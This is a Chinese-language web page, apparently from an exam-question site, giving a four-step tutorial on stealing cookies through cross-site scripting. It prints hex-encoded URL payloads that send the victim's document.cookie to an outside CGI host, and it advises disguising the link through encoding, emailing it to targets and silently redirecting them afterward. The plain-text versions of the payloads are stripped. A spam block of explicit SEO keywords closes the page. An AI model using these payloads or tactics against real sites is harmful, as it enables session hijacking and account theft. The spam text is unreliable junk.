<dfn id="w48us"></dfn><ul id="w48us"></ul>
  • <ul id="w48us"></ul>
  • <del id="w48us"></del>
    <ul id="w48us"></ul>
  • 解釋一下XSS cookie盜竊是什么意思

    時(shí)間:2023-02-10 14:09:25 筆試題目 我要投稿
    • 相關(guān)推薦

    解釋一下XSS cookie盜竊是什么意思

      根據(jù)作為攻擊對(duì)象的Web程序,下面某些變量和插入位置可能需要進(jìn)行調(diào)整。要注意這只是攻擊方法的一個(gè)例子。在這個(gè)例子中,我們將利用腳本“a.php”中的 “viriable”變量中的跨站腳本漏洞,通過(guò)正常請(qǐng)求進(jìn)行攻擊。這是跨站腳本攻擊最常見(jiàn)的形式。

      第一步: 鎖定目標(biāo)

      當(dāng)你找到某個(gè)Web程序存在XSS漏洞之后,檢查一下它是否設(shè)置了cookie。如果在該網(wǎng)站的任何地方設(shè)置了cookie,那么就可以從用戶那里盜取它。

      第二步: 測(cè)試

      不同的攻擊方式將產(chǎn)生不同的XSS漏洞,所以應(yīng)適當(dāng)進(jìn)行測(cè)試以使得輸出結(jié)果看起來(lái)像是正常的。某些惡意腳本插入之后會(huì)破壞輸出的頁(yè)面。(為欺騙用戶,輸出結(jié)果非常重要,因此攻擊者有必要調(diào)整攻擊代碼使輸出看起來(lái)正常。)

      下一步你需要在鏈接至包含XSS漏洞的頁(yè)面的URL中插入 Javascript(或其他客戶端腳本)。下面列出了一些經(jīng)常用于測(cè)試XSS漏洞的鏈接。當(dāng)用戶點(diǎn)擊這些鏈接時(shí),用戶的cookie獎(jiǎng)被發(fā)送到 cgisecurity.com/cgi-bin/cookie.cgi 并被顯示。如果你看到顯示結(jié)果中包含了cookie信息,說(shuō)明可能可以劫持該用戶的賬戶。

      盜取Cookie的Javascript示例。使用方法如下。

      ASCII用法

      http://host/a.php?variable=”>

      十六進(jìn)制用法

      http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f

      %63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67

      %69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f

      %6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

      注意: 每種用法都先寫(xiě)為ASCII,再寫(xiě)成十六進(jìn)制以便復(fù)制粘貼。

      1. “>

      HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e

      %6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65

      %63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f

      %63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

      2.

      HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f

      %63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72

      %69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b

      %69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e

      3. >

      HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c

      %6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75

      %72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f

      %6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e

      第三步: 執(zhí)行XSS

      將做好的URL通過(guò)電子郵件或其他方式發(fā)送出去。注意如果你直接將URL發(fā)送給其他人(通過(guò)電子郵件、即時(shí)通訊軟件或其他方式),你應(yīng)當(dāng)將其進(jìn)行十六進(jìn)制編碼,因?yàn)檫@些URL一眼便可看出包含惡意代碼,但經(jīng)過(guò)十六進(jìn)制編碼之后就可以欺騙大部分人。

      第四步: 處理收集到的信息

      一旦用戶點(diǎn)擊了你的URL,相應(yīng)數(shù)據(jù)就會(huì)被發(fā)送到你的CGI腳本中。這樣你就獲得了 cookie信息,然后你可以利用Websleuth之類的工具來(lái)檢查是否能盜取那個(gè)賬戶。

      在上面的例子中,我們僅僅將用戶帶到了 cookie.cgi頁(yè)面上。如果你有時(shí)間,你可以在CGI中將用戶重定向到原來(lái)的頁(yè)面上,即可在用戶不知不覺(jué)之中盜取信息。

      某些電子郵件程序在打開(kāi)附件時(shí)會(huì)自動(dòng)執(zhí)行附件中的Javascript代碼。即使像Hotmail這樣的大型網(wǎng)站也是如此,不過(guò)它對(duì)附件內(nèi)容作了許多過(guò)濾以避免cookie被盜。

    【解釋一下XSS cookie盜竊是什么意思】相關(guān)文章:

    清明的意思是什么04-04

    論民事盜竊與刑事盜竊的區(qū)分06-06

    3.15是什么意思07-26

    諺語(yǔ)是什么意思?07-23

    諺語(yǔ)是什么意思11-08

    小年是什么意思01-16

    入伏是什么意思07-07

    尾牙是什么意思10-20

    小雪是什么意思?07-17

    主站蜘蛛池模板: 无码精品人妻一区二区三区免费 | 国模精品一区二区三区| 无码人妻精品一区二区三18禁| 亚洲精品欧美综合在线| 欧美精品v欧洲精品| 欧美国产精品va在线观看| 欧美亚洲精品在线| 国自产偷精品不卡在线| 亚洲国产精品一区第二页| 久久se这里只有精品| jizz国产精品| 日本精品在线视频| 国产精品日韩AV在线播放| 亚洲av午夜成人片精品网站| 无码精品人妻一区二区三区免费| 国产精品午夜福利在线无码| 亚洲精品视频在线| 精品福利资源在线| 国产精品丝袜黑色高跟鞋| 亚洲AV第一页国产精品| 亚洲中文字幕无码久久精品1 | 久久久99精品成人片中文字幕| 久久免费精品一区二区| 99精品国产一区二区三区2021| 无码人妻精品一区二区三区在线| 亚洲欧美日韩精品久久亚洲区 | 2021国产成人精品久久| 成人午夜精品网站在线观看| 精品人伦一区二区三区潘金莲| 亚洲无线观看国产精品| 伊人久久大香线蕉精品不卡| 四虎影视永久在线精品| 久久久久无码精品国产app| 黑人巨茎精品欧美一区二区 | 久久er热视频在这里精品| 国产精品成人va| 69国产成人综合久久精品| 凹凸国产熟女精品视频app| 黑人巨大精品欧美| 99精品视频3| 青青青国产精品国产精品久久久久|